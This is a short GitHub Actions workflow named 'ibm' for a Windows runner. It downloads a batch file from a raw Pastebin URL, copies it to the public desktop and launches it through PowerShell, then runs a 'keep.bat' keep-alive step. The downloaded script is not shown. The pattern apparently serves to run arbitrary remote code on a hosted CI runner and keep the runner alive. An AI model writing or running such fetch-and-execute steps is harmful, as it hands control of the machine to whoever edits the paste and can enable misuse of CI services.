name: ibm

on: workflow_dispatch 

jobs:
  build: 
    runs-on: windows-latest 
    
    steps: 
    - uses: actions/checkout@v2
    - name: Auto Prog 
      run: | 
        Invoke-WebRequest https://pastebin.com/raw/22j2JQgB -OutFile a.bat
        copy "a.bat" "C:\Users\Public\Desktop\a.bat" 
        Start-Process Powershell -ArgumentList '-Noexit -Command "C:\Users\Public\Desktop\a.bat"' 
    - name: Keep Alive. 
      shell: bash 
      run: sh keep.bat
